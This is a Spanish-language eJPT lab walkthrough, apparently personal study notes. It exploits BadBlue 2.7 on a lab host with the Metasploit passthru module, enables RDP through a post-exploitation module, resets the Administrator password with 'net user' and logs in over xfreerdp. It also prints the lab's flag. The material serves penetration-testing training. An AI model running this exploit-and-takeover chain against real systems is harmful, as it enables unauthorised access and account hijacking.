> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/post-explotacion/postexplotacion-en-windows/habilitacion-de-rdp.md).

# Habilitación de RDP

## 📋 ¿Qué es RDP?

**Remote Desktop Protocol (RDP)** es un protocolo propietario desarrollado por **Microsoft** que permite a los usuarios conectarse de forma remota a sistemas Windows a través de una interfaz gráfica. Esta funcionalidad es ampliamente utilizada por administradores de sistemas para gestionar equipos de manera remota, y también puede ser aprovechada en escenarios de post-explotación para mantener acceso a sistemas comprometidos.

***

## 📗 Características clave de RDP:

* Utiliza el **puerto TCP 3389** por defecto.
* Permite control total del sistema mediante una **interfaz gráfica completa**.
* Requiere **credenciales válidas** (nombre de usuario y contraseña en texto claro) para iniciar sesión.

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/8BTrjaFAESyxC6X7OtEw" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/cvQeNKl6mZRJoawPgOa1" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Ejecute un escaneo de Nmap contra el objetivo:

**Dominio:**

```
nmap demo.ine.local
```

<figure><img src="/files/uKcN0xIKGbdZ8ljau3nQ" alt=""><figcaption></figcaption></figure>

**Nota:** El puerto predeterminado RDP no está expuesto: 3389.

**Paso 4:** Hemos detectado que varios puertos están abiertos. Ejecutaremos nmap de nuevo para determinar la versión del puerto 80.

**Dominio:**

```
nmap -sV -p 80 demo.ine.local
```

<figure><img src="/files/huuGdsnFEWDYjHKC27LU" alt=""><figcaption></figcaption></figure>

**BadBlue 2.7** se está ejecutando en el objetivo.

**Paso 5:** Buscaremos el módulo de explotación de badblue 2.7 usando searchsploit.

**Dominio:**

```
searchsploit badblue 2.7
```

<figure><img src="/files/gSSH7zXG3YN5XSCADvdj" alt=""><figcaption></figcaption></figure>

**Paso 6:** Existe un módulo de metasploit para el servidor BadBlue. Usaremos el módulo de metasploit PassThru para desbordamiento de búfer remoto y explotaremos el objetivo.

**Comandos:**

```
msfconsole -q
use exploit/windows/http/badblue_passthru
set RHOSTS demo.ine.local
exploit
```

<figure><img src="/files/2PZU1t5FtmToCxq63U4t" alt=""><figcaption></figcaption></figure>

Hemos explotado con éxito la aplicación vulnerable objetivo (badblue) y recibimos un shell meterpreter.

Antecedentes de la sesión.

**Paso 7:** Habilitación del servicio RDP mediante el módulo de explotación posterior de Windows.

**Comandos:**

```
use post/windows/manage/enable_rdp
set SESSION 1
exploit
```

<figure><img src="/files/KWhT88Sba3NnMVYEhWlX" alt=""><figcaption></figcaption></figure>

El exploit posterior funcionó correctamente. Estoy ejecutando nmap nuevamente para comprobar si el puerto RDP está expuesto.

**Dominio:**

```
nmap demo.ine.local
```

<figure><img src="/files/UBncHT6n7rLtQsgP3xH1" alt=""><figcaption></figcaption></figure>

El puerto RDP 3389 está expuesto.

**Paso 8:** Interactúe con el shell de meterpreter y cambie la contraseña de administrador.

**Comandos:**

```
sessions -i 1
shell
net user administrator hacker_123321
```

<figure><img src="/files/IzaJvkhNfUXFMhSwsC6z" alt=""><figcaption></figcaption></figure>

**Paso 9:** Conéctese al servicio RDP utilizando la utilidad xfreerdp y la cuenta de administrador.

**Dominio:**

```
xfreerdp /u:administrator /p:hacker_123321 /v:demo.ine.local

Y
```

<figure><img src="/files/ykEQx8lZktErlggNZueN" alt=""><figcaption></figcaption></figure>

**Paso 10:** Leer el archivo flag.txt que está presente en el escritorio del usuario Administrador.

<figure><img src="/files/ielmMbYA99RGokDZnRqe" alt=""><figcaption></figcaption></figure>

Esto nos revela la bandera.

**Bandera:** 763e1c86da26c66e86a8537fd343280d

#### Conclusión

En este laboratorio, explotamos una aplicación vulnerable para obtener acceso al shell en el objetivo y luego usamos un módulo metasploit posterior a la explotación para habilitar RDP en el objetivo e iniciar una sesión RDP.

Referencias

* [BadBlue 2.72b Multiple Vulnerabilities](https://www.exploit-db.com/exploits/4715)
* [Metasploit Module](https://www.rapid7.com/db/modules/exploit/windows/http/badblue_passthru)
* [Post Exploitation Module](https://www.rapid7.com/db/modules/post/windows/manage/enable_rdp)
